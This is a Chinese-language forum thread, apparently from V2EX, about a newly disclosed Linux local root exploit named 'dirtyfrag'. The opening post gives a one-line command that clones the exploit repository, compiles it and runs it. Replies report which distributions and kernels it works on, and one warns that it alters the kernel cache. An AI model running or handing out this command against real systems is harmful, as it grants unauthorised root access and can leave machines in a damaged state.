新一键 root 提权漏洞 dirtyfrag.io

16 小时 35 分钟前

miyuki

https://dirtyfrag.io

验证

git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

3703 次点击

所在节点

信息安全

40 条回复

duchenpaul

13 小时 27 分钟前

这个终端是啥，光标有点炫

lllllliu

13 小时 22 分钟前

@chouvel 这种漏洞是 linux 设计上的问题，windows 同类型的很少很少很少基本木有。

ShareDuck

13 小时 21 分钟前

@chouvel 肯定有啊。你没发现你的 Windows 每个月都在打补丁么？

kaleido

13 小时 19 分钟前

题外话，你这个 shell 的光标效果是咋实现的，提示符也简洁好看，可以分享下吗？

greatbody

13 小时 12 分钟前

Android 要是也有这样的提权漏洞就好了，可恶的小米。

Akikiki

13 小时 12 分钟前

不要手贱在公司机器上执行。。。。

x86

13 小时 3 分钟前

debian12 失败

miyuki

12 小时 54 分钟前

@kaleido
https://github.com/vyrx-dev/symphony forest

liam01

12 小时 53 分钟前

这个有没有病毒啊，想在公司的机子上测试一下

lzy250

12 小时 49 分钟前

@liam01 没有，但执行后修改了内核缓存，弄完要想办法恢复

liam01

12 小时 9 分钟前

@lzy250 那好吧，那还是不要轻易弄了

ingram22mb30

12 小时 3 分钟前

@hefish 7#
debian12 的第几个版，还有内核版本多少。
想偷懒！

AutumnVerse

11 小时 56 分钟前

牛逼，ubuntu24.04 复现成功

abolast

11 小时 42 分钟前

@liam01 你执行 > 云服务商检测到报警通报安全负责人 > 运维进入紧急处理 > 发现是你 > 改成紧急处理你

apples01

10 小时 46 分钟前

Fedora-KDE-Desktop-Live-44-1.7.x86_64 完美提权

shirakawatyu

8 小时 12 分钟前

6.14 内核 ubuntu 24.04 复现成功，之前 copyfail 都没成功这个直接一发入魂

shiny

8 小时 6 分钟前

很难想象，各国政府在过去手里握了多少 0-day 漏洞

hefish

6 小时 22 分钟前

@ingram22mb30 12.12, vmlinuz-6.1.0-28-amd64 , 其他版本未测。

meteora0tkvo

6 小时 8 分钟前

@chouvel #13 windows 提权很简单，直接弹出 UAC 弹窗让用户点确定，不点就不给用

liantao

5 小时 31 分钟前

谁测了 centOS7 ，说下结果，感谢

第 2 页／共 2 页

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://study.congcong.us/t/1211129

V2EX 是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.